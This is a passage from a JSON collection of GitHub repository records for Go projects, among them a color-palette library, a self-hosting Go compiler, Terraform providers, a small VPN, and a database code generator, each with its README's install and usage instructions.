Finally you can remix your favorite wallpapers in Crayola-style!\n\n```go\ncolors = palette.Crayola.Clamped(colors)\n```\n\n### Generating Color Palettes\n\nColor Generators, like the provided `PastelGenerator`, `WarmGenerator` or\n`HappyGenerator` can produce random (within the color space constraints of the\ngenerator) color palettes:\n\n```go\ncolors, err = gamut.Generate(8, gamut.PastelGenerator{})\n```\n\n![Pastel Palette](https://github.com/muesli/gamut/blob/master/docs/palette_pastel.png)\n\nThe `SimilarHueGenerator` produces colors with a hue similar to a given color:\n\n```go\ncolors, err = gamut.Generate(8, gamut.SimilarHueGenerator{Color: gamut.Hex(\"#2F1B82\")})\n```\n\n![Similar Hue Palette](https://github.com/muesli/gamut/blob/master/docs/palette_similarhue.png)\n\nUsing the `ColorGenerator` interface, you can also write your own color generators:\n\n```go\ntype BrightGenerator struct {\n\tBroadGranularity\n}\n\nfunc (cc BrightGenerator) Valid(col colorful.Color) bool {\n\t_, _, l := col.Lab()\n\treturn 0.7 <= l && l <= 1.0\n}\n\n...\ncolors, err := gamut.Generate(8, BrightGenerator{})\n```\n\nOnly colors with a lightness between 0.7 and 1.0 will be accepted by this generator.\n\n## Themes\n\n| Name | Colors |\n| ------- | -----: |\n| Monokai | 7 |\n\n### Roles\n\n```go\ncolor = theme.MonokaiTheme.Role(theme.Foreground)\n```\n\nAvailable roles are `Foreground`, `Background`, `Base`, `AlternateBase`, `Text`,\n`Selection`, `Highlight`.\n\n## Feedback\n\nGot some feedback or suggestions? Please open an issue or drop me a note!\n\n* [Twitter](https://twitter.com/mueslix)\n* [The Fediverse](https://mastodon.social/@fribbledom)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "DQNEO/minigo", "link": "https://github.com/DQNEO/minigo", "tags": ["go", "compiler", "golang", "assembly", "parser", "lexer"], "stars": 506, "description": "minigo\ud83d\udc25is a small Go compiler made from scratch. It can compile itself.", "lang": "Go", "repo_lang": "", "readme": "# minigo\ud83d\udc25\n\n[![Go](https://github.com/DQNEO/minigo/workflows/Go/badge.svg)](https://github.com/DQNEO/minigo/actions) [![CircleCI](https://circleci.com/gh/DQNEO/minigo.svg?style=svg)](https://circleci.com/gh/DQNEO/minigo)\n\n\nA Go compiler made from scratch.\n\n# Notice\n\nThis repository is no longer maintained actively.\n\nI made another Go compiler `babygo` from scratch again, which is much more simple, sophisticated and understandable.\n\nPlease look at https://github.com/DQNEO/babygo\n\n\n# Description\n\n`minigo\ud83d\udc25` is a small Go compiler made from scratch. 
It can compile itself.\n\n* Generates a single static binary executable\n* No dependency on yacc/lex or any external libraries\n* Standard libraries are also made from scratch\n\nIt depends only on GNU Assembler and GNU ld.\n\n`minigo` supports x86-64 Linux only.\n \n# Design\n\nI made this almost without reading the original Go compiler.\n\n`minigo` inherits most of its design from the following:\n\n* 8cc (https://github.com/rui314/8cc)\n* 8cc.go (https://github.com/DQNEO/8cc.go)\n\nThere are several steps in the compilation process.\n\n[go source] -> byte_stream.go -> [byte stream] -> token.go -> [token stream] -> parser.go -> [AST] -> gen.go -> [assembly code]\n\n\n# How to run\n\nYou need Linux, so I would recommend that you use Docker.\n\n```sh\n$ docker run --rm -it -w /mnt -v `pwd`:/mnt dqneo/ubuntu-build-essential:go bash\n```\n\nAfter entering the container, you can build and run it.\n\n```sh\n$ make\n$ ./minigo t/hello/hello.go > hello.s\n$ as -o hello.o hello.s\n$ ld -o hello hello.o\n$ ./hello\nhello world\n```\n\n# How to \"self compile\"\n\n```sh\n$ make\n$ ./minigo --version\nminigo 0.1.0\nCopyright (C) 2019 @DQNEO\n\n$ ./minigo *.go > /tmp/minigo2.s\n$ as -o /tmp/minigo2.o /tmp/minigo2.s\n$ ld -o minigo2 /tmp/minigo2.o\n$ ./minigo2 --version\nminigo 0.1.0\nCopyright (C) 2019 @DQNEO\n\n$ ./minigo2 *.go > /tmp/minigo3.s\n$ as -o /tmp/minigo3.o /tmp/minigo3.s\n$ ld -o minigo3 /tmp/minigo3.o\n$ ./minigo3 --version\nminigo 0.1.0\nCopyright (C) 2019 @DQNEO\n```\n\nYou will see that the contents of 2nd generation compiler and 3rd generation compiler are identical.\n\n```sh\n$ diff /tmp/minigo2.s /tmp/minigo3.s\n```\n\n# Test\n\n```sh\n$ make test\n```\n\n# Debug by gdb\n\nAdd `--cap-add=SYS_PTRACE --security-opt='seccomp=unconfined'` option to `docker run`.\nIt will allow you to use `gdb` in the docker image.\n\n```\ndocker run --cap-add=SYS_PTRACE --security-opt='seccomp=unconfined' -it --rm -w /mnt -v `pwd`:/mnt --tmpfs=/tmp/tmpfs:rw,size=500m,mode=1777 dqneo/ubuntu-build-essential:go bash\n```\n\n## The Assembly language\nWe are currently using GNU assembler in AT&T syntax.\n\nhttps://sourceware.org/binutils/docs/as/i386_002dDependent.html#i386_002dDependent\n\n# AUTHOR\n\n[@DQNEO](https://twitter.com/DQNEO)\n\n# LICENSE\n\nMIT License\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "hashicorp/terraform-provider-kubernetes-alpha", "link": "https://github.com/hashicorp/terraform-provider-kubernetes-alpha", "tags": ["terraform", "kubernetes", "infrastructure-as-code"], "stars": 506, "description": "A Terraform provider for Kubernetes that uses dynamic resource types and server-side apply. Supports all Kubernetes resources.", "lang": "Go", "repo_lang": "", "readme": "# \u26a0\ufe0f Archived\n\nThis repository was experimental and is now archived. The `kubernetes_manifest` resource and associated issues has been moved to the repository for the official [Terraform Provider for Kubernetes](https://github.com/hashicorp/terraform-provider-kubernetes). While the kubernetes-alpha provider will continue to be downloadable from the Terraform Registry up to the last version released, we recommend migrating your configurations to use the `kubernetes_manifest` resource in our official Terraform provider. 
For further details, take a look at our [blog post](https://www.hashicorp.com/blog/beta-support-for-crds-in-the-terraform-provider-for-kubernetes) announcing this change.\n\n\n# Kubernetes provider for Terraform (alpha) \n\n \"Terraform\n\n\n\n![Status: Experimental](https://img.shields.io/badge/status-experimental-EAAA32) [![Releases](https://img.shields.io/github/release/hashicorp/terraform-provider-kubernetes-alpha.svg)](https://github.com/hashicorp/terraform-provider-kubernetes-alpha/releases)\n[![LICENSE](https://img.shields.io/github/license/hashicorp/terraform-provider-kubernetes-alpha.svg)](https://github.com/hashicorp/terraform-provider-kubernetes-alpha/blob/master/LICENSE)\n![unit tests](https://github.com/hashicorp/terraform-provider-kubernetes-alpha/workflows/unit%20tests/badge.svg)\n![acceptance tests](https://github.com/hashicorp/terraform-provider-kubernetes-alpha/workflows/acceptance%20tests/badge.svg)\n\nThis Kubernetes provider for Terraform (alpha) supports all API resources in a generic fashion.\n\nThis provider allows you to describe any Kubernetes resource using HCL. See [Moving from YAML to HCL](#moving-from-yaml-to-hcl) if you have YAML you want to use with the provider.\n\nPlease regard this project as experimental. It still requires extensive testing and polishing to mature into production-ready quality. At this time, we are not planning to create a migration path for resources created with the kubernetes-alpha provider when the `manifest` resource is merged into the official kubernetes provider. For this reason, please do not rely on this provider for production use while we strive towards project maturity. Please [file issues](https://github.com/hashicorp/terraform-provider-kubernetes-alpha/issues/new/choose) generously and detail your experience while using the provider. We welcome your feedback.\n\nOur eventual goal is for this generic resource to become a part of our [official Kubernetes provider](https://github.com/hashicorp/terraform-provider-kubernetes) once it is supported by the Terraform Plugin SDK. However, this work is subject to signficant changes as we iterate towards that level of quality.\n\n## Requirements\n\n* [Terraform](https://www.terraform.io/downloads.html) version 0.14.8 +\n* [Kubernetes](https://kubernetes.io/docs/reference) version 1.17.x +\n* [Go](https://golang.org/doc/install) version 1.14.x\n\n## Getting Started\n\nIf this is your first time here, you can get an overview of the provider by reading our [introductory blog post](https://www.hashicorp.com/blog/deploy-any-resource-with-the-new-kubernetes-provider-for-hashicorp-terraform/).\n\nOtherwise, start by installing the latest release from the [Terraform registry](https://registry.terraform.io/providers/hashicorp/kubernetes-alpha/latest).\n\nOnce you have the plugin installed, review the [usage document](https://github.com/hashicorp/terraform-provider-kubernetes-alpha/blob/master/docs/usage.md) in the [docs](https://github.com/hashicorp/terraform-provider-kubernetes-alpha/blob/master/docs/) folder to understand which configuration options are available. You can find the following examples and more in [our examples folder](https://github.com/hashicorp/terraform-provider-kubernetes-alpha/blob/master/examples/). 
Don't forget to run `terraform init` in your Terraform configuration directory to allow Terraform to detect the provider plugin.\n\n### Create a Kubernetes ConfigMap\n```hcl\nprovider \"kubernetes-alpha\" {\n config_path = \"~/.kube/config\" // path to kubeconfig\n}\n\nresource \"kubernetes_manifest\" \"test-configmap\" {\n provider = kubernetes-alpha\n\n manifest = {\n \"apiVersion\" = \"v1\"\n \"kind\" = \"ConfigMap\"\n \"metadata\" = {\n \"name\" = \"test-config\"\n \"namespace\" = \"default\"\n }\n \"data\" = {\n \"foo\" = \"bar\"\n }\n }\n}\n```\n\n### Create a Kubernetes Custom Resource Definition\n\n```hcl\nprovider \"kubernetes-alpha\" {\n config_path = \"~/.kube/config\" // path to kubeconfig\n}\n\nresource \"kubernetes_manifest\" \"test-crd\" {\n provider = kubernetes-alpha\n\n manifest = {\n apiVersion = \"apiextensions.k8s.io/v1\"\n kind = \"CustomResourceDefinition\"\n metadata = {\n name = \"testcrds.hashicorp.com\"\n }\n spec = {\n group = \"hashicorp.com\"\n names = {\n kind = \"TestCrd\"\n plural = \"testcrds\"\n }\n scope = \"Namespaced\"\n versions = [{\n name = \"v1\"\n served = true\n storage = true\n schema = {\n openAPIV3Schema = {\n type = \"object\"\n properties = {\n data = {\n type = \"string\"\n }\n refs = {\n type = \"number\"\n }\n }\n }\n }\n }]\n }\n }\n}\n```\n\n## Using `wait_for` to block create and update calls\n\nThe `kubernetes_manifest` resource supports the ability to block create and update calls until a field is set or has a particular value by specifying the `wait_for` attribute. This is useful for when you create resources like Jobs and Services when you want to wait for something to happen after the resource is created by the API server before Terraform should consider the resource created.\n\n`wait_for` currently supports a `fields` attribute which allows you specify a map of fields paths to regular expressions. You can also specify `*` if you just want to wait for a field to have any value.\n\n```hcl\nresource \"kubernetes_manifest\" \"test\" {\n provider = kubernetes-alpha\n\n manifest = {\n // ...\n }\n\n wait_for = {\n fields = {\n # Check the phase of a pod\n \"status.phase\" = \"Running\"\n\n # Check a container's status\n \"status.containerStatuses[0].ready\" = \"true\",\n\n # Check an ingress has an IP\n \"status.loadBalancer.ingress[0].ip\" = \"^(\\\\d+(\\\\.|$)){4}\"\n\n # Check the replica count of a Deployment\n \"status.readyReplicas\" = \"2\"\n\n # Check for an annotation\n \"metadata.annotations[\\\"test.annotation\\\"]\" = \"*\"\n }\n }\n}\n\n```\n\n## Moving from YAML to HCL\n\nThe `manifest` attribute of the `kubernetes_manifest` resource accepts any arbitrary Kubernetes API object, using Terraform's [map](https://www.terraform.io/docs/configuration/expressions.html#map) syntax. If you have YAML you want to use with this provider, we recommend that you convert it to a map as an initial step and then manage that resource in Terraform, rather than using `yamldecode()` inside the resource block. \n\nYou can quickly convert a single YAML file to an HCL map using this one liner:\n\n```\necho 'yamldecode(file(\"test.yaml\"))' | terraform console\n```\n\nAlternatively, there is also an experimental command line tool [tfk8s](https://github.com/jrhouston/tfk8s) you could use to convert Kubernetes YAML manifests into complete Terraform configurations.\n\n## Contributing\n\nWe welcome your contribution. Please understand that the experimental nature of this repository means that contributing code may be a bit of a moving target. 
If you have an idea for an enhancement or bug fix, and want to take on the work yourself, please first [create an issue](https://github.com/hashicorp/terraform-provider-kubernetes-alpha/issues/new/choose) so that we can discuss the implementation with you before you proceed with the work.\n\nYou can review our [contribution guide](https://github.com/hashicorp/terraform-provider-kubernetes-alpha/blob/master/_about/CONTRIBUTING.md) to begin. You can also check out our [frequently asked questions](https://github.com/hashicorp/terraform-provider-kubernetes-alpha/blob/master/_about/FAQ.md).\n\n## Experimental Status\n\nBy using the software in this repository (the \"Software\"), you acknowledge that: (1) the Software is still in development, may change, and has not been released as a commercial product by HashiCorp and is not currently supported in any way by HashiCorp; (2) the Software is provided on an \"as-is\" basis, and may include bugs, errors, or other issues; (3) the Software is NOT INTENDED FOR PRODUCTION USE, use of the Software may result in unexpected results, loss of data, or other unexpected results, and HashiCorp disclaims any and all liability resulting from use of the Software; and (4) HashiCorp reserves all rights to make all decisions about the features, functionality and commercial release (or non-release) of the Software, at any time and without any obligation or liability whatsoever.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kanocz/lcvpn", "link": "https://github.com/kanocz/lcvpn", "tags": ["golang", "vpn"], "stars": 506, "description": "Decentralized VPN in golang", "lang": "Go", "repo_lang": "", "readme": "# LCVPN - Light decentralized VPN in golang\n\nOriginally this repo was just an answer on a question \"how much time it'll take to write my own simple VPN in golang\" (answer is about 3 hours for first prototype), but now it is used in production in different environments.\n\nSo, LCVPN is\n - Very light and easy (one similar config on all hosts)\n - Uses the same config on all hosts (autodetects local params) - useful with puppet etc\n - Uses AES-128, AES-192 or AES-256 encryption (note that AES-256 is **much slower** than AES-128 on most computers) + optional HMAC-SHA256 or (super secure! \ud83d\ude05 ) NONE encryption (just copy without modification)\n - Communicates via UDP directly to the selected host (no central server)\n - Works only on Linux (uses TUN device)\n - Supports basic routing - can be used to connect several networks\n - Multithreaded send and receive - scalable for heavy traffic\n - Uses so_reuseport for better results with a bigger number of hosts\n - It's still in beta stage, use it at your own risk (and please use only versions marked as \"release\")\n\n![alt tag](https://raw.githubusercontent.com/kanocz/lcvpn/master/topology.png)\n\n### Install and run\n\nYou need golang (at least 1.5) installed and configured:\n\n```sh\n$ go get -u github.com/kanocz/lcvpn\n```\n\nIf your config is in /etc/lcvpn.conf:\n\n```sh\n$ sudo $GOPATH/bin/lcvpn\n```\n\nIf you want to specify a different config location (or if you need to run several instances):\n\n```sh\n$ sudo $GOPATH/bin/lcvpn -config lcvpn.conf\n```\nIf your host is hidden behind a firewall (with UDP port forwarding), lcvpn is unable to detect\nwhich \"remote\" is localhost. 
In this case use next syntax:\n\n```sh\n$ sudo $GOPATH/bin/lcvpn -local berlin -config lcvpn.conf\n```\n\n\n### Config example\n\n```\n[main]\nport = 23456\nencryption = aescbc\nmainkey = 4A34E352D7C32FC42F1CEB0CAA54D40E9D1EEDAF14EBCBCECA429E1B2EF72D21\naltkey = 1111111117C32FC42F1CEB0CAA54D40E9D1EEDAF14EBCBCECA429E1B2EF72D21\nbroadcast = 192.168.3.255\nnetcidr = 24\nrecvThreads = 4\nsendThreads = 4\n\n[remote \"prague\"]\nExtIP = 46.234.105.229\nLocIP = 192.168.3.15\nroute = 192.168.10.0/24\nroute = 192.168.15.0/24\nroute = 192.168.20.0/24\n\n[remote \"berlin\"]\nExtIP = 103.224.182.245\nLocIP = 192.168.3.8\nroute = 192.168.11.0/24\n\n[remote \"kiev\"]\nExtIP = 95.168.211.37\nLocIP = 192.168.3.3\n```\n\nwhere port is UDP port for communication \nencryption is *aescbc* for AES-CBC, *aescbchmac* for AES-CBC+HMAC-SHA245 or *none* for no encryption \nfor *aescbc* mainkey/altkey is hex form of 16, 24 or 32 bytes key (for AES-128, AES-192 or AES-256) \nfor *aescbchmac* mainkey/altkey is 32 bytes longer\nfor *none* mainkey/altkey mainkey/altkey is just ignored\nnumber of remotes is virtualy unlimited, each takes about 256 bytes in memory \n\n### Config reload\n\nConfig is reloaded on HUP signal. In case of invalid config just log message will appeared, previous one is used. \nP.S.: listening udp socket is not reopened for now, so on port change restart is needed\n\n### Online key change\n\n**altkey** configuration option allows specify alternative encryption key that will be used in case if decription with primary\none failed. This allow to use next algoritm to change keys without link going offline:\n - In normal state only **mainkey** is set (setting altkey is more cpu-consuming)\n - Set altkey to new key on all hosts and send HUP signal\n - Exchange altkey and aeskey on all hosts and send HUP signal\n - Remove altkey (with old key) from configs on all hosts and send HUP signal again\n - We are running with new key :)\n\n### Roadmap\n\n* 100% unit test coverage\n* please let me know if you need anything more\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "cloudflare/ahocorasick", "link": "https://github.com/cloudflare/ahocorasick", "tags": [], "stars": 506, "description": "A Golang implementation of the Aho-Corasick string matching algorithm", "lang": "Go", "repo_lang": "", "readme": "ahocorasick\n===========\n\nA Golang implementation of the Aho-Corasick string matching algorithm\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "openzipkin-contrib/zipkin-go-opentracing", "link": "https://github.com/openzipkin-contrib/zipkin-go-opentracing", "tags": ["zipkin", "instrumentation", "go", "opentracing", "tracing", "trace", "distributed-tracing", "openzipkin"], "stars": 505, "description": "OpenTracing Bridge for Zipkin Go", "lang": "Go", "repo_lang": "", "readme": "# zipkin-go-opentracing\n\n[![Travis CI](https://travis-ci.org/openzipkin-contrib/zipkin-go-opentracing.svg?branch=master)](https://travis-ci.org/openzipkin-contrib/zipkin-go-opentracing)\n[![GoDoc](https://godoc.org/github.com/openzipkin-contrib/zipkin-go-opentracing?status.svg)](https://godoc.org/github.com/openzipkin-contrib/zipkin-go-opentracing)\n[![Go Report 
Card](https://goreportcard.com/badge/github.com/openzipkin-contrib/zipkin-go-opentracing)](https://goreportcard.com/report/github.com/openzipkin-contrib/zipkin-go-opentracing)\n[![Sourcegraph](https://sourcegraph.com/github.com/openzipkin-contrib/zipkin-go-opentracing/-/badge.svg)](https://sourcegraph.com/github.com/openzipkin-contrib/zipkin-go-opentracing?badge)\n\n[OpenTracing](http://opentracing.io) bridge for the native [Zipkin](https://zipkin.io) tracing implementation [Zipkin Go](https://github.com/openzipkin/zipkin-go).\n\n### Notes\n\nThis package is a simple bridge to allow OpenTracing API consumers\nto use Zipkin as their tracing backend. For details on how to work with spans\nand traces we suggest looking at the documentation and README from the\n[OpenTracing API](https://github.com/opentracing/opentracing-go).\n\nFor developers interested in adding Zipkin tracing to their Go services we\nsuggest looking at [Go kit](https://gokit.io) which is an excellent toolkit to\ninstrument your distributed system with Zipkin and much more with clean\nseparation of domains like transport, middleware / instrumentation and\nbusiness logic.\n\n### Examples\n\nPlease check the [zipkin-go](https://github.com/openzipkin/zipkin-go) package for information how to set-up the Zipkin Go native tracer. Once set-up you can simple call the `Wrap` function to create the OpenTracing compatible bridge.\n\n```go\nimport (\n\t\"github.com/opentracing/opentracing-go\"\n\t\"github.com/openzipkin/zipkin-go\"\n\tzipkinhttp \"github.com/openzipkin/zipkin-go/reporter/http\"\n\tzipkinot \"github.com/openzipkin-contrib/zipkin-go-opentracing\"\n)\n\nfunc main() {\n\t// bootstrap your app...\n \n\t// zipkin / opentracing specific stuff\n\t{\n\t\t// set up a span reporter\n\t\treporter := zipkinhttp.NewReporter(\"http://zipkinhost:9411/api/v2/spans\")\n\t\tdefer reporter.Close()\n \n\t\t// create our local service endpoint\n\t\tendpoint, err := zipkin.NewEndpoint(\"myService\", \"myservice.mydomain.com:80\")\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"unable to create local endpoint: %+v\\n\", err)\n\t\t}\n\n\t\t// initialize our tracer\n\t\tnativeTracer, err := zipkin.NewTracer(reporter, zipkin.WithLocalEndpoint(endpoint))\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"unable to create tracer: %+v\\n\", err)\n\t\t}\n\n\t\t// use zipkin-go-opentracing to wrap our tracer\n\t\ttracer := zipkinot.Wrap(nativeTracer)\n \n\t\t// optionally set as Global OpenTracing tracer instance\n\t\topentracing.SetGlobalTracer(tracer)\n\t}\n \n\t// do other bootstrapping stuff...\n}\n```\n\nFor more information on zipkin-go-opentracing, please see the documentation at\n[go doc](https://godoc.org/github.com/openzipkin-contrib/zipkin-go-opentracing).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "aliyun/terraform-provider-alicloud", "link": "https://github.com/aliyun/terraform-provider-alicloud", "tags": ["terraform", "terraform-provider", "alicloud"], "stars": 505, "description": "Terraform AliCloud provider", "lang": "Go", "repo_lang": "", "readme": "Terraform Provider For Alibaba Cloud\n==================\n\n- Website: https://www.terraform.io\n- [![Gitter chat](https://badges.gitter.im/hashicorp-terraform/Lobby.png)](https://gitter.im/hashicorp-terraform/Lobby)\n- Mailing list: [Google Groups](http://groups.google.com/group/terraform-tool)\n\n \n\n\n\n\n\nSupported Versions\n------------------\n\n| Terraform version | minimum provider version |maxmimum provider 
version\n| ---- | ---- | ----| \n| >= 0.11.x\t| 1.0.0\t| latest |\n\nRequirements\n------------\n\n-\t[Terraform](https://www.terraform.io/downloads.html) 0.12.x\n-\t[Go](https://golang.org/doc/install) 1.13 (to build the provider plugin)\n- [goimports](https://godoc.org/golang.org/x/tools/cmd/goimports):\n ```\n go get golang.org/x/tools/cmd/goimports\n ```\n\nBuilding The Provider\n---------------------\n\nClone repository to: `$GOPATH/src/github.com/aliyun/terraform-provider-alicloud`\n\n```sh\n$ mkdir -p $GOPATH/src/github.com/aliyun; cd $GOPATH/src/github.com/aliyun\n$ git clone git@github.com:aliyun/terraform-provider-alicloud\n```\n\nEnter the provider directory and build the provider\n\n```sh\n$ cd $GOPATH/src/github.com/aliyun/terraform-provider-alicloud\n$ make build\n```\n\nUsing the provider\n----------------------\n## Fill in for each provider\n\nDeveloping the Provider\n---------------------------\n\nIf you wish to work on the provider, you'll first need [Go](http://www.golang.org) installed on your machine (version 1.11+ is *required*). You'll also need to correctly setup a [GOPATH](http://golang.org/doc/code.html#GOPATH), as well as adding `$GOPATH/bin` to your `$PATH`.\n\nTo compile the provider, run `make build`. This will build the provider and put the provider binary in the `$GOPATH/bin` directory.\n\n```sh\n$ make build\n...\n$ $GOPATH/bin/terraform-provider-alicloud\n...\n```\n\nRunning `make dev` or `make devlinux` or `devwin` will only build the specified developing provider which matchs the local system.\nAnd then, it will unarchive the provider binary and then replace the local provider plugin.\n\nIn order to test the provider, you can simply run `make test`.\n\n```sh\n$ make test\n```\n\nIn order to run the full suite of Acceptance tests, run `make testacc`.\n\n*Note:* Acceptance tests create real resources, and often cost money to run.\n\n```sh\n$ make testacc\n```\n\n## Acceptance Testing\nBefore making a release, the resources and data sources are tested automatically with acceptance tests (the tests are located in the alicloud/*_test.go files).\nYou can run them by entering the following instructions in a terminal:\n```\ncd $GOPATH/src/github.com/aliyun/terraform-provider-alicloud\nexport ALICLOUD_ACCESS_KEY=xxx\nexport ALICLOUD_SECRET_KEY=xxx\nexport ALICLOUD_REGION=xxx\nexport ALICLOUD_ACCOUNT_ID=xxx\nexport ALICLOUD_RESOURCE_GROUP_ID=xxx\nexport outfile=gotest.out\nTF_ACC=1 TF_LOG=INFO go test ./alicloud -v -run=TestAccAlicloud -timeout=1440m | tee $outfile\ngo2xunit -input $outfile -output $GOPATH/tests.xml\n```\n\n-> **Note:** The last line is optional, it allows to convert test results into a XML format compatible with xUnit.\n\n\n-> **Note:** Most test cases will create PostPaid resources when running above test command. 
However, currently not all\n account site types support creating PostPaid resources, so you need to set your account site type before running the command:\n```\n# If your account belongs to domestic site\nexport ALICLOUD_ACCOUNT_SITE=Domestic\n\n# If your account belongs to international site\nexport ALICLOUD_ACCOUNT_SITE=International\n```\nSetting the account site type allows unsupported test cases to be skipped automatically.\n\n-> **Note:** At present, there is no CMS contact group resource, so please create a contact group manually in the web console and set it via the environment variable `ALICLOUD_CMS_CONTACT_GROUP`, like:\n ```\n export ALICLOUD_CMS_CONTACT_GROUP=tf-testAccCms\n ```\n Otherwise, all of the `alicloud_cms_alarm` resource's test cases will be skipped.\n\n## References\n\nAlibaba Cloud Provider [Official Docs](https://www.terraform.io/docs/providers/alicloud/index.html)\nAlibaba Cloud Provider Modules [Official Modules](https://registry.terraform.io/browse?provider=alicloud)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "libretro/ludo", "link": "https://github.com/libretro/ludo", "tags": ["libretro", "libretro-frontend", "libretro-api", "golang", "glfw", "bindings", "emulation", "opengl", "retrogaming", "ui", "openal"], "stars": 504, "description": "A libretro frontend written in golang", "lang": "Go", "repo_lang": "", "readme": "# ludo ![Build Status](https://github.com/libretro/ludo/workflows/CI/badge.svg) [![GoDoc](https://godoc.org/github.com/libretro/ludo?status.svg)](https://godoc.org/github.com/libretro/ludo)\n\nLudo is a work-in-progress libretro frontend written in Go.\n\n\n\nIt is able to launch most non-GL libretro cores.\n\nIt works on OSX, Linux, Linux ARM and Windows. You can download releases [here](https://github.com/libretro/ludo/releases).\n\n## Dependencies\n\n- GLFW 3.3\n- OpenGL >= 2.1\n- OpenAL\n\n#### On OSX\n\nYou can execute the following command and follow the instructions about exporting PKG_CONFIG:\n\n brew install openal-soft\n\n#### On Debian or Ubuntu\n\n sudo apt-get install libopenal-dev xorg-dev golang\n\n#### On Raspbian\n\nYou need to enable the experimental VC4 OpenGL support (Full KMS) in raspi-config.\n\n sudo apt-get install libopenal-dev xorg-dev\n\n#### On Alpine / postmarketOS\n\n sudo apk add musl-dev gcc openal-soft-dev libx11-dev libxcursor-dev libxrandr-dev libxinerama-dev libxi-dev mesa-dev\n\n#### On Windows\n\nSet up the OpenAL headers and DLL in the mingw-w64 `include` and `lib` folders.\n\n## Building\n\n git clone --recursive https://github.com/libretro/ludo.git\n cd ludo\n go build\n\nFor more detailed build steps, please refer to [our continuous delivery config](https://github.com/libretro/ludo/blob/master/.github/workflows/cd.yml).\n\n## Running\n\n ./ludo\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "eatonphil/dbcore", "link": "https://github.com/eatonphil/dbcore", "tags": [], "stars": 505, "description": "Generate applications powered by your database.", "lang": "Go", "repo_lang": "", "readme": "# DBCore (ALPHA)\n\nDBCore is a code generator built around database schemas and an API\nspecification. Included with DBCore are templates for generating a Go\nREST API and React UI.\n\n## Features and API specification\n\nThe DBCore project can build any templates from your\ndatabase. 
It also defines an API specification with useful\nfunctionality for rapidly standing up an API around your database.\n\nBecause DBCore does code generation, it can build well-typed code. The\nbuilt-in Go API templates are a great example of this.\n\nBut since the API specification is language-agnostic, all these\nfeatures are supported no matter what language you use to generate a\nDBCore API.\n\nMajor features include:\n\n* Get one, get many, create, edit, delete endpoints\n* Filtering, sorting, pagination\n* JWT-based authentication, per-endpoint/method SQL filter-based authorization\n\nUpcoming features include:\n\n* Lua-based hooks and transformations\n* SSO integration\n\n[See the docs site for more detail.](https://www.dbcore.org)\n\n## Example\n\n![Screenshot of list view with pagination](docs/screenshot.png)\n\nThere's a built-in notes application with non-trivial\nauthorization. Users belong to an org. Notes belong to a user. Notes\nthat are marked public don't need a session. Otherwise they can only\nbe viewed by other users within the same org. Only org admins or the\nnotes creator can modify a note.\n\n```bash\n$ git clone git@github.com:eatonphil/dbcore\n$ cd dbcore\n$ make example-notes\n$ cd ./examples/notes/api\n$ ./main\nINFO[0000] Starting server at :9090 pkg=server struct=Server\n... in a new window ...\n$ curl -X POST -d '{\"username\": \"alex\", \"password\": \"alex\", \"name\": \"Alex\"}' localhost:9090/users/new\n{\"id\":1,\"username\":\"alex\",\"password\":\"alex\",\"name\":\"Alex\"}\n$ curl 'localhost:9090/users?limit=25&offset=0&sortColumn=id&sortOrder=desc' | jq\n{\n \"total\": 1,\n \"data\": [\n {\n \"id\": 1,\n \"username\": \"alex\",\n \"password\": \"alex\",\n \"name\": \"Alex\"\n },\n ]\n}\n```\n\nAnd to build the UI:\n\n```\n$ cd examples/notes/browser\n$ yarn start\n```\n\nLog in with any of the following credentials:\n\n* admin:admin (Org 1)\n* notes-admin:admin (Org 2)\n* editor:editor (Org 2)\n\n## Dependencies\n\n* Go\n* PostgreSQL, MySQL or SQLite3\n* .NET Core\n\n## Restrictions\n\nThere are a bunch of restrictions! Here are a few known ones. You will\ndiscover more and you may fix them!\n\n* Only tables supported (i.e. no views)\n* Only single-column foreign keys supported\n* Only Go API, React UI templates provided\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "tgres/tgres", "link": "https://github.com/tgres/tgres", "tags": ["time-series", "postgresql-database", "statsd", "grafana", "graphite", "go", "golang"], "stars": 505, "description": "Time Series in Go and PostgreSQL", "lang": "Go", "repo_lang": "", "readme": "\nTgres is a program comprised of several packages which together can be\nused to receive, store and present time-series data using a relational\ndatabase as persistent storage (currently only PostgreSQL).\n\nYou can currently use the standalone Tgres daemon as Graphite-like API\nand Statsd replacement all-in-one, or you can use the Tgres packages\nto incorporate time series collection and reporting functionality into\nyour application.\n\nSee [GoDoc](https://godoc.org/github.com/tgres/tgres) for package\ndetails.\n\nWhether you use standalone Tgres or as a package, the time series data\nwill appear in your database in a compact and efficient format (by\ndefault as a view called `tv`), while at the same time simple to\nprocess using any other tool, language, or framework because it is\njust a table (or a view, rather). 
